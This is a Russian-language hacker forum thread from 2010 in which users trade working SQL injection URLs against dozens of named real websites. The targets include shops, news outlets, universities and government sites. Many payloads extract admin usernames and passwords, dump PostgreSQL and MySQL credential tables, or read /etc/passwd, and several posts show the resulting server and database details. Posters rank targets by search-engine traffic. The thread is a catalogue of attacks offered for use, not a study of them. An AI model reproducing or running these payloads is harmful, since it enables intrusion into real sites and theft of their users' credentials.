http://www.daily-calcio.com/index.php?option=news&task=viewarticle&sid=-27855+uNIon+sELEct+1,2,concat_ws(0x3a3a,username,p assword),4,5,6,7,8,9+from+users+limit+5,1+--+
rcmedia.town-local.net пр2
Code:
http://rcmedia.town-local.net/software/index.php?option=com_downloads&Itemid=50&func=download&filecatid=-19+union+select+concat_ws(0x3a3a,UseRNamE,password )+from+mos_users+--+
optishop.ru
Code:
http://optishop.ru/group.php?id=-57+uNIoN+sELecT+user(),2,3+--+
KENT1994
21.07.2010, 00:23
Code:
www.jieyanbar.com/jycs.look.php?ID=286 +union+select+1,%String_Col%,3,4,5--
Host IP: 114.113.148.1
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: mlyjy
Code:
topic.0731fdc.com/Mascot/look.php?id=4+union+select 1,2,%String_Col%--
Host IP: 222.240.149.26
Web Server: Apache/2.2.14 (Unix)
Powered-by: PHP/5.2.11
DB Server: MySQL >=4.1
Current DB: 0731fc
Code:
www.lisenok.ru/look.php?id=1781 UNION ALL SELECT %String_Col%,2,3,4,5--
Host IP: 194.135.105.50
Web Server: Apache/1.3.41 (Unix) PHP/5.2.5
Powered-by: PHP/5.2.5
DB Server: MySQL
Current DB: db_lisenok1
Code:
www.tunahan.org/look.php?bolm=basin&id=3 UNION ALL SELECT 1,%String_Col%,3,4,5,6--
Host IP: 38.113.1.176
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: suleyman
Code:
www.spravkatver.ru/look.php?cat_id=19&c_id=362&id=3449 AND %True_Expression%
Host IP: 77.221.130.43
Web Server: nginx/0.6.32
Powered-by: PHP/5.2.6-1+lenny8
DB Server: MySQL
Current DB: ),$
Code:
www.xmkj.net/look.php?id=45457 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22--
Host IP: 121.199.124.72
Web Server: Apache/2.0.59 (Unix) DAV/2 mod_jk/1.2.26
Powered-by: PHP/4.4.9
DB Server: MySQL unknown ver
Current DB: zky081_db
Code:
www.stalpraas.com/eng/look.php?id=107 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14--
Host IP: 85.17.197.141
Web Server: Apache/2
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: stalpraa_website
Code:
www.diysuits.com/look.php?id=513 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9--
Host IP: 69.163.226.1
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: frsuitssql
https://ws1.gaslightmedia.com/tomsmoms/retail_shop/display_product.phtml?cust_id=&user_num=&cust_status=guest&zip=&prod_id=4+union+select+null,null,null,null,null,nu ll,null,version()::int--+
--Боян--
http://www.supplierdiversityeurope.eu/news_details.php?id=-82+union+select+1,group_concat(0x0b,username,0x3a, password),3,4,5,6,7,8,9,10,11,12,13+from+SDE_users--
http://www.dulam.com/news_details.php?id=-9+union+select+1,2,3,group_concat(0x0b,Username,0x 3a,Password),5,6,7,8+from+dulam_admin--
http://www.businessanalytica.ru/ru/news/news_details.php?id=-66+union+select+1,2,3,4,group_concat(0x0b,table_na me)+from+information_schema.tables--
http://www.melker-online.de/addinol/news_details.php?id=-14+union+select+1,2,3,4,group_concat(0x0b,table_na me),6+from+information_schema.tables--
http://www.a1accommodation.com.au/news_details.php?id=-11+union+select+1,2,3,4,group_concat(0x0b,table_na me),6+from+information_schema.tables--
http://www.abraxascorp.com/news_details.php?id=-12+union+select+1,2,group_concat(0x0b,admin_login, 0x3a,admin_pass),4,5+from+admin--
DezMond™
21.07.2010, 15:20
newmexicohistory.org пр6 тиц10
Code:
http://www.newmexicohistory.org/filedetails.php?fileID=23133+union+select+1,2,3,4, concat_ws(0x3a3a,user_name,password)+from+adminUse r+--+
gloriousindia.com пр2
Code:
http://www.gloriousindia.com/unleashed/place.php?id=-228659+union+select+1,concat_ws(0x3a3a,email,passw ord,name,pwd),3,4,5,6,7,8,9,10+from+user+--+
celadon-international.com пр3 тиц10
Code:
http://www.celadon-international.com/place.php?id=-38+union+select+concat_ws(0x3a3a,username,password )+from+wh_users+--+
finance.tut.by пр5 тиц170
Code:
http://finance.tut.by/insurance.php?mode=company&id=-1'+union+select+1,2,concat_ws(0x3a3a,id,username,p assword,email,type),4,5,6,7,8,9,10,11,12,13+from+u sers+limit+1,100+--+
10.of.by пр5 тиц210
Code:
http://10.of.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2272'+union+select+1,2,group_concat(table_name),4, 5,6,7,8+from+information_schema.tables+group+by+ta ble_schema+limit+2,1+--+
http://www.galeriapresenca.pt/site/index.php?pag=noticias&subpag=detalhe&id=51+union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+ from+pg_user--
Code:
http://www.davico.co.uk/catalogue.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,con cat_ws(char(58),version(),user(),database(),@@vers ion_compile_os),8,9,0,1,2,3,4,5,6,7,8,9--+
Version: 5.0.83-community-nt
User: davico@localhost
Database: davico
Os: Win32
http://rantburg.com PR-6
// смотрим версию Postgre
http://rantburg.com/poparticle.php?ID=141137+union+select+cast(version () as int)+from+pg_user&D=2006-01-30&SO=&HC=1
// смотрим доступ к pg_shadow
http://rantburg.com/poparticle.php?ID=141137+union+select+version()::i nt+from+pg_shadow&D=2006-01-30&SO=&HC=1
//круто! есть доступ к pg_shadow, попробуем вытащить логин и пароль
http://rantburg.com/poparticle.php?ID=141137+union+select+cast(usename ||chr(58)||passwd as int)+from+pg_shadow&D=2006-01-30&SO=&HC=1
з.ы хочу напомнить что первые три символа xэша это алгоритм шифрования, в нашем случаe md5, при расшифровке нужно это вырезать
-PRIVAT-
21.07.2010, 21:35
http://www.dwstadium.co.uk/suite.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--
PR-5
http://www.analisi.ru/info.php?id=-7+union+select+1,group_concat%28column_name%29,3,4 %20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TAB LE_NAME=0x70687062625f61636c5f7573657273%20--
PR-60
ТИЦ-3
Скуля:
Code:
http://www.kuroed.com/?id=158
Колонка: 1
Юзер: kuroed@localhost
Версия: 4.1.22-log
тИЦ: 90
-PRIVAT-
22.07.2010, 11:23
http://www.alphaonenow.org/info.php?id=-57+union+select+1,2,3,4,5,6,7,8,9,0,group_concat%2 8column_name%29,2,3,4,5,6,7,8,9,0,1,2%20FROM%20INF ORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x766 25f61646d696e6973747261746f72%20--
PR-4
http://www.fourstarrealty.com/agent.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8%20--
PR-3
ТИЦ-10
http://www.premiermontreal.com/agent.php?id=-37+union+select+1,2,3,4,5%20--
http://www.rav-riders.com/doc/motos/moto.php?id=-13+union+select+1,2,user(),4,5,6,7,8,9,0,1,2 --
PR-1
http://www.bullster.com/en/catalogue-moto.php?id=-93312+union+select+1,2,3,4%20--
PR-2
http://katalog.motorky.com/moto.php?id=-98+union+select+1,concat_ws%280x3a,id,username,pas sword%29,3,4,5,6,7,8,9+from+moto_users%20--
PR-4
http://www.banzai-moto.com/concession_kawasaki/banzai-fiche-moto.php?id=-54+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4%20--
PR-1
http://www.fcl.ru/filial.php?id=-2+union+select+1 --
PR-1
ТИЦ-10
http://infametr.ru/infa/-1079202+'+UNION+SELECT+1,concat_ws(0x3a,version(), user(),database()),3+--+
http://pics.kz/s5/e0/0d/c1/e00dc1463e06b0e55bf0780dc96cb085.gif
Очень большой траф.
KENT1994
22.07.2010, 22:47
Code:
http://www.smolensk2.ru/user.php?login=v.v. AND %True_Expression%
Host IP: 80.93.48.50
Web Server: Apache/2.2.14 (Fedora)
Powered-by: PHP/5.2.9
DB Server: MySQL
http://deti.db.am/play/view/-82977+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,ve rsion(),user(),database()),9,10,11,12,13,14,15,16, 17,18,19,20,21+--+
Поисковая система.
http://www.itopfield.com.au/product-detail.asp?idx=1+or+1=(SELECT+TOP+1+cast(Username+ as+nvarchar)%2B'%3A'%2Bcast(Password+as+nvarchar)+ from+frmAuthor)
Microsoft SQL Server 2005
http://www.thefootballramble.com/blog-full.asp?id=-1+union+select+1,unhex(hex(version())),3,4,5
MySQL4 под вендой =\
http://www.focasa.com/landstart.asp?land=1' or 1=(SELECT TOP 1 cast(user_login as nvarchar)%2B'%3A'%2Bcast(user_password as nvarchar) FROM users)--
Microsoft SQL Server 2000 с немецкой локализацией
http://athletics.menlo.edu/news.php?spcat=12345+and+1=cast((SELECT+version()| |chr(58)||current_user||chr(58)||current_database( ))+as+int)
PostgreSQL 8.3.7
http://www.eurotruss.nl/news_show.php?id=-1' union select 1,2,3,version(),5,6/*
MySQL5 без каких-либо признаков таблиц с пользовательскими данными..
шоп
http://www.eliteshina.ru/tyreinfo.php?id=285+union+select+version()::int,nu ll,null,null,null,null,null+from+pg_user--
Skofield
23.07.2010, 21:28
Code:
http://www.domoticaviva.com/PHP/newsphp.php?id=-804+union+select+1,2,3,version%28%29,5,6,7,8/*
Database Version: 4.1.22
Database name: qbs057
User name: qbs057@217.76.130.103
-PRIVAT-
23.07.2010, 22:33
http://spb.egent.ru/metro/metro.php?id=-187+union+select+1,2,3%20--
ТИЦ-20
http://www.agentam.ru/metro.php?id=-139+union+select+concat_ws%280x3a,id_ag,nameco,nam ,passwd%29+from+users--
ТИЦ-10
PR-2
http://www.cyb-elles.org/popup/institut.php?id=-3+union+select+1,group_concat%28column_name%29,4,2 +from+information_schema.columns+where+table_name= 0x62645f666f72756d%20--
ТИЦ-10
PR-3
cerd-rj.com.br pr 2
Code:
http://www.cerd-rj.com.br/cartilha.php?secao=12-999.9+union+select+1,2,3,4,concat_ws(0x3a,user(),v ersion(),database(),@@version_compile_os)--
tanaka-usa.com pr 5 тиц 10
Code:
http://www.tanaka-usa.com/index.php?section=156-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,us er(),version(),database(),@@version_compile_os),9, 10,11,12,13,14--
wordsbyrachel.com pr 1
Code:
http://wordsbyrachel.com/page.php?go=2-999.9+union+select+1,2,3,concat_ws(0x3a,user(),ver sion(),database(),@@version_compile_os)--
CyberHunter
24.07.2010, 14:24
http://www.chirurgie-hernie-paris.com/institut.php?id=30+and+substring(version(),1,1)=4--+
Version: 4
----------------
http://www.ipb-ild.edu.rs/institut.php?id=1027+and+substring(version(),1,1)= 3
Version: 3
----------------
http://www.agentam.ru/metro.php?id=-139+union+select+1--+
User: agent_db@localhost
Database: agent_db
Version: 5.0.77
CY: 10
PR: 2
Users
http://www.agentam.ru/metro.php?id=-139+union+select+concat(id_ag,0x3a,ident,0x3a,name co,0x3a,stat,0x3a,fam,0x3a,nam,0x3a,ot,0x3a,tel1,0 x3a,tel2,0x3a,email,0x3a,www,0x3a,icq,0x3a,acc,0x3 a,dat_in,0x3a,dat_last,0x3a,col_recs,0x3a,activ,0x 3a,ip,0x3a,passwd,0x3a,logo,0x3a,kod,0x3a,smscode) +from+users+limit+0,1--+
Взрыв мозга, MySQL5. Есть таблицы cpg14x_users fe_users be_users evo_users, но на их просмотр, судя по всему, нет прав
http://www.stevens.edu/provost/news/single_news.php?news_events_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83--
iv. said:
Взрыв мозга, MySQL5. Есть таблицы cpg14x_users fe_users be_users evo_users, но на их просмотр, судя по всему, нет прав
http://www.stevens.edu/provost/news/single_news.php?news_events_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(user_name,char(58),user_password),14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83+f rom+cop.cpg14x_users
просто другая база ))
SofiaLoar
24.07.2010, 15:29
http://www.keglia.ru/raskazread.php?idArticle=-17+union+select+concat_ws(0x3a,user_email,user_pas sword),2,3+from+phpbb_users+limit+1,1+--+
боян/raskazread.php?idArticle=-17+union+select+concat_ws(0x3a,user_email,user_pas sword),2,3+from+phpbb_users+limit+1,1+--+
http://azbyka.ru/znakomstva/index.php?module=community&file=user&id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,emai l,password,login),25,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5 2,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68, 69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85 ,86,87,88+from+pravmamba_users+limit+0,1
-PRIVAT-
24.07.2010, 22:49
http://www.ivanivanich.ru/disc.php?id=-49+union+select+1,user%28%29,3,4,5,6,7,8,9,0%20--
ТИЦ-20
PR-1
http://www.mahaliajackson.us/discography/disc.php?id=-141+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 --
PR-2
http://assassinatecaesar.com/disc.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--
http://joansanmarti.com/disc.php?id=-29+union+select+1,2,3,4,5,6,7,8%20--
ПРИМОРСК судоремонтное предприятие
http://www.primorck.ru/index.php?sublist=-1+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@@ version,user(),database(),@@version_compile_os),7, 8,9,10+--
version : 5.0.91-community
user : primorck_goga@localhost
database : primorck_db
os : unknown-linux-gnu
Прокуратура Чукотского автономного округа
http://prokuror.chukotnet.ru/index.php?section=4&action=view&id=-623+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12&module=newsmodule&src=%40random45eb8fba06bd1
5.0.77rokurorrokuror@localhost:redhat-linux-gnu
arcsoft.com
Code:
http://www.arcsoft.com/press/viewrelease.asp?releaseid=189-999.9+union+select+1,database(),user(),4,5,6,7,8,9 ,10,version(),12,13--
PR 6
тиц 200
-PRIVAT-
25.07.2010, 02:20
http://news.franchiseindia.com/print_news.php?id=-2-213+union+select+1,2,1,1,2,3,4,5,1,7,8,9,0 --
ТИЦ-10
PR-5
http://www.utu.org/print_news.cfm?ArticleID=-51312+union+select+1,2 --
ТИЦ-10
PR-6
[Microsoft][ODBC Microsoft Access Driver]
http://www.thenewghanaian.com/print_news.asp?id=-801+or+1=%28SELECT+TOP+1+TABLE_NAME+FROM+INFORMATI ON_SCHEMA.TABLES%29--
PR-1
http://www.1c.lutsk.ua/print_news.php?id=-201+union+select+1,2,3,4,version%28%29,6%20--
ТИЦ-1300
PR-2
http://www.fbcwc.ca/print_news.php?id=-20+union+select+1,2,3,4%20--
PR-5
http://www.clarkrealtycapital.com/print_news.asp?id=-21767441+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3 --
PR-4
[Microsoft][ODBC SQL Server Driver]
http://www.ghanaonthenet.com/print_news.asp?id=1+or+1=%28SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES%29--
PR-2
[Microsoft][ODBC Microsoft Access Driver]
http://www.icdl.org.za/print_pages.php?id=-7+union+select+1,2,3,4,5,6 --
PR-1
CARC
http://www.carc.jo/pages_en.php?type=page&id=-3279+union+select+version()
PR-7
---
http://www.nooralhusseinfoundation.org/index.php?pager=end&task=view&type=content&pageid=-76+union+select+1,2,concat(username,char(58),passw ord),4,5,6,7+from+users--
PR-5
KENT1994
25.07.2010, 14:52
shops
Code:
http://www.ealandmania.net/catalogs/buy.php?c=1%27&p=4&o=79 AND %True_Expression% AND 'x'='x
Host IP: 208.76.82.37
Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
DB Server: MySQL
Current DB: T,# WQQS #C#,�28Tx>f?}{Wryvp?~f???q?Y?o#50M??Bo?@xMF4??lT_c
Code:
http://www.mnsnowmobiler.org/index.php?pageid=92 AND %True_Expression%
Host IP: 198.31.50.252
Web Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.11 mod_ssl/2.8.31 OpenSSL/0.9.8i
Powered-by: PHP/5.2.11
DB Server: MySQL
Code:
http://www.ikancorp.com/productInfo.php?id=188%27 AND %True_Expression%
Host IP: 174.132.79.187
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Code:
Боян!
Host IP: 74.52.164.178
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: bugnbots_bugnbots
Code:
http://chinashoppingzone.com/productinfo.php?id=238%27 AND %True_Expression%
Host IP: 195.191.102.128
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
DB Server: MySQL
Code:
Боян!
Host IP: 85.17.199.6
Web Server: Apache/2
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: flashin_sparkms
Code:
http://shoppingtang.com/productinfo.php?id=186%27 AND %True_Expression%
Host IP: 173.201.111.157
Web Server: Apache
DB Server: MySQL
Code:
http://www.g20trade.com/productinfo.php?id=500%27 AND %True_Expression%
Host IP: 173.201.1.154
Web Server: Apache
DB Server: MySQL
Code:
http://www.chinashopunion.com/productinfo.php?id=103%27 AND %True_Expression%
Host IP: 97.74.137.145
Web Server: Apache
DB Server: MySQL
Code:
http://www.shopcarnival.com/productinfo.php?id=367%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
Code:
http://storecarnival.com/productinfo.php?id=365%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
Code:
http://www.sghgate.com/productinfo.php?id=606%27 AND %True_Expression%
Host IP: 195.191.102.57
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
DB Server: MySQL
Code:
http://www.thegenealogist.co.uk/nameindex/productinfo.php?id=24%27 AND %True_Expression%
Host IP: 195.224.80.57
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL
Code:
http://www.shopzooly.com/productinfo.php?id=751%27 AND %True_Expression%
Host IP: 173.201.150.242
Web Server: Apache
DB Server: MySQL
Code:
http://shelleysigns.co.uk/public_html/productinfo.php?id=204%27&KeepThis=true&TB_iframe=true&height=532&width=675 AND %True_Expression%
Host IP: 212.38.84.178
Web Server: Apache
DB Server: MySQL
Code:
Боян!
Host IP: 198.66.255.130
Web Server: Apache/2.2.15 (Unix) PHP/5.2.9 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/0.9.8m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.9
DB Server: MySQL unknown ver
Current DB: atmweb
Code:
http://luckinthebox3.com/productinfo.php?id=209%27 AND %True_Expression%
Host IP: 173.201.81.179
Web Server: Apache
DB Server: MySQL
Code:
http://www.wishesg20.com/productinfo.php?id=429%27 AND %True_Expression%
Host IP: 173.201.0.93
Web Server: Apache
DB Server: MySQL
Code:
http://www.zoolystore.com/productinfo.php?id=1287%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
Code:
Боян!
Host IP: 173.201.81.179
Web Server: Apache
DB Server: MySQL
Code:
http://www.hellozooly.com/productinfo.php?id=437%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
Code:
http://rental.microsearch.com/productInfo.php?id=114%27 AND %True_Expression%
Host IP: 174.132.79.187
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Code:
http://www.zoolystyle.com/productinfo.php?id=222%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
+++
--------
Konqi : постиш скули которые постил раньше???
/showthread.php?p=2133841
я как бы предупреждал тебе уже
Error-based blind SQLi
http://www.bsmotoring.com/storypage.php?autono=-1 or (select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))--
кто-нить знает как тут выводить строки из таблиц? что-то я крутил-крутил и ничего =\
"Русское Радио", "Радио Шансон"-Астрахань
http://www.astrakhanfm.ru/news/news.php?id=-23047+and+1=2+union+select+1,2,concat_ws(char(58), @@version,user(),database(),@@version_compile_os), 4,5,6,7--&&rid=17
version : 4.1.22-lk-log
user : astrakhanru@localhost
database : astrakhanru
os : pc-linux-gnu
http://snews.awddesign.co.uk/snews/index.php?category=-3%20union%20select%200,version(),2,3,4,5,6,7,8
version: 4.1.22
user: awddesign_sn3@83.223.106.8
-PRIVAT-
26.07.2010, 19:36
http://www.webagro.net/printnews.php?id=92952+union+select+1,2,3,4,5,6,7, 8%20--
ТИЦ-150
PR-4
Code:
http://lxn.ru/index.php?id=870'%20union%20select%201,2,3,4,5
ТИЦ 30
PR 3
http://www.ghra.org/events.php?eventid=45+and+1=0+union+select+1,2,3,4 ,concat_ws(0x3a,user(),version(),database(),@@vers ion_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24--
какой-то сайт китайский.с бегаюшими ментами
http://www.zszx.org/page.php?Id=-5661union+select+1,%20version(),3,4+--+
http://www.eco-schools.org/page.php?id=18+union+select+1,2,3,4,5+--+
Code:
http://www.tea-home.ru/userfiles/file/page.php?id=46'%20union%20select%201,2,3,4,5%20--
ТИЦ 0
PR 1
Code:
http://www.begopayrollservices.nl/detachering/cv-bank.php?ID=-13+union+select+1,2,3,4,5,6,7,8%20--
Code:
http://www.business-consultant.ru/page.php?id=262%20union%20select%201,2,3,4,5%20--
ТИЦ 0
PR 1
Code:
http://www.magnitogorsk.org/org/page.php?id=33'%20union%20select%201,2,3,4,5%20--
ТИЦ 20
PR 0
Code:
http://www.tehcomsnab.ru/page.php?id=54%20union%20select%201,2,3,4,5%20--
Code:
http://www.trimax.ru/page.php?id=139%20union%20select%201,2,3,4,5%20--
ТИЦ 10
PR 1
Code:
http://www.vip-poet.ru/page.php?id=7%20union%20select%201,2,3,4,5%20--
ТИЦ 20
PR 2
http://anavar.ru/articls/?id=100+union+select+1,2,3,4,5,6,7+--+
тиц 150
пр 3
Боян (/showpost.php?p=2210269&postcount=12411)
18+
http://7-ru.net/view_video.php?id=-56+union+select+1,2,3,4,5,6,7,8+--+
http://www.guamhome.com/irw/printlisting.php?lid=11458+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,aes_decrypt( aes_encrypt(LOAD_FILE(CHAR(47,101,116,99,47,112,97 ,115,115,119,100)),1),1),21,22,23,24,25,26,27,28,2 9,30,31,32+from+mysql.user--
http://www.guamhome.com/irw/printlisting.php?lid=11458+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,aes_decrypt( aes_encrypt(concat(user,char(58),password),1),1),2 1,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user--
zoccolo.ru - в строчке поиска на главной вводим
Code:
')union/**/select/**/1,2,3,concat_ws(char(58),version(),user(),database (),@@version_compile_os)#
результат запроса в конце страницы
Version: 5.0.26-lk-log
User: zoccolor@localhost
Database: zoccolor
Os: pc-linux-gnu
тИЦ — 190
PR — 5
если кто-нибудь знает, как докрутить подобного рода sql-inj, буду рад видеть ответ в пм...
Code:
http://www.nytc.org/dbacceptance.cfm?ID=-1+union+select+null,null,null,null,null,null,null, null,null,null,123,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null+from+r aces%00
ACCESS 2000
тИЦ — 10
PR — 4
Code:
http://www.club-perexod.ru/penews.php?id=-1+union+select+1,concat_ws(char(58),version(),user (),database(),@@version_compile_os),3,4,5,6,7,8--+
Version: 5.0.26-log
User: clubperexo@localhost
Database: clubperexo
Os: pc-linux-gnu
тИЦ — 20
http://www.channel5belize.com/archive_detail_story.php?story_id=-19702+union+select+1,2,3,4,5,6,group_concat(userna me,char(58),password)+from+admin_login--+
PR-6
-------
http://www.mmegi.bw/index.php?sid=1&aid=1'+or(1,1)=(select+count(0),concat((select+ver sion()+from+information_schema.tables+limit+0,1),f loor(rand(0)*2))from(information_schema.tables)+gr oup+by+2)--+&dir=2008/October/Wednesday8
http://www.mmegi.bw/phpinfo.php ))
PR-6
Code:
http://www.ksda.gov/open_records/id/1+or+1=(select+top+1+@@version+from+information_sc hema.tables)--+
Version: Microsoft SQL Server 2000 - 8.00.2055
Platform : Intel X86
OS: Windows NT 5.2 (Build 3790: Service Pack 2)
PR — 6
Code:
http://house.legis.state.la.us/H_Reps/members.asp?ID=-1+union+select+null,null,null,null,null,null,null, null,111,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null+from+MSysAccessO bjects
Version: Access 1997
PR — 5
http://www.bashkiakorce.gov.al/frontend/articles.php?cid=-144+union+select+1,2,3,4,version()--+
http://www.rockreport.be/review.asp?id=1414+union+select+1+--+
яндекс тиц 10
яндекс RANK 2/6
Google PageRank 4/10
Code:
http://www.privacycorps.com/products/?id=-1+union+select+1,2,3,unhex(hex(concat_ws(char(58), version(),user(),database(),@@version_compile_os)) ),5,6,7,8,9,0,1,2,3--+
Version: 4.1.11-Debian_etch1-log
User: pcorps@web2.msomt.modwest.com
Database: privacycorps
OS: pc-linux-gnu
PR - 5
Code:
http://www.panicandaction.com/artists.php?id=-1+union+select+1,2,concat_ws(char(58),version(),us er(),database(),@@version_compile_os),4,5,6,7,8,9, 0,1,2--+
Version: 5.0.41
User: panicandaction.com@195.249.40.166
Database: panicandaction_com
OS: pc-linux-gnu
PR - 3
Code:
http://www.mussonjamaica.com/about_web.php?id=-1'+union+select+1,concat_ws(char(58),version(),use r(),database(),@@version_compile_os),3,4--+
Version: 5.0.45-community-nt
User: pdbuser@localhost
Database: mussonjamaica_webdb
OS: Win32
PR - 4
Code:
http://www.wingate.ru/products.php?todo=view&id=-1+union+select+1,2,3,concat_ws(char(58),version(), user(),database(),@@version_compile_os),5,6,7,8,9, 0--+
Version: 5.0.45
User: anysoft1_wing@localhost
Database: anysoft1_wing
OS: redhat-linux-gnu
тИЦ - 150
PR - 3
Code:
http://dendymaster.ru/index.php?pages=catalog&id=-1+union+select+1,concat_ws(char(58),version(),user (),database(),@@version_compile_os),3,4,5,6,7,8,9, 0--+
Version: 4.1.25-log
User: dendymas@localhost
Database: wwwdendymasterru
OS: portbld-freebsd6.2
тИЦ - 30
PR - 3
http://ironmiketyson.ru/article_read.php?id=1+gunion+select+1,2,3,4+--+
Калининград
http://www.kaliningrad.yabloko.ru/news/index.phtml?id=-251+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a, @@version,user(),database(),@@version_compile_os), 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26+--
version : 5.0.51a-24+lenny4-log
user : kaliningrad@localhost
database : kaliningrad
os : debian-linux-gnu
Code:
http://www.adyashanti.org/index.php?file=writings_inner&writingid=-35+union+select+1,2,concat_ws(char(58),version(),u ser(),database(),@@version_compile_os),4,5,6--+
Version: 5.0.91-community
User: adyash2_ogs@localhost
Database: adyash2_ogs
OS: pc-linux-gnu
PR - 4
nemaniak
29.07.2010, 18:25
sdelanovspb.ru PR-5 ТИЦ-30
Code:
http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,concat_ws%280x3a,version%28%29 ,user%28%29,database%28%29%29,4,5+--+
Code:
5.1.39-log:sdelanov@localhost:sdelanov
ndl-global.com PR-5 ТИЦ-190
Code:
http://ndl-global.com/print.php?news=-92+union+select+1,2,concat_ws%280x3a,version%28%29 ,user%28%29,database%28%29%29,4,5+--+
Code:
5.0.88-log:ndlprofy_test@217.112.35.67:ndlprofy_test
to nemaniak
sdelanovspb.ru PR-5 ТИЦ-30
Code:
http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,cast%28concat%28table_name,0x3 a,column_name%29%20as%20binary%29,4,5+from+informa tion_schema.columns+where+column_name+like+0x25706 1737325--
Итог:
Code:
http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,concat%28user_login,0x3a,user_ pass%29,4,5+from+uw_users--
Траблы с админкой, две админки!
ndl-global.com PR-5 ТИЦ-190
Code:
http://ndl-global.com/print.php?news=-92+union+select+1,2,cast%28concat%28table_name,0x3 a,column_name%29%20as%20binary%29,4,5+from+informa tion_schema.columns+where+column_name+like+0x25706 1737325--
Итог:
Code:
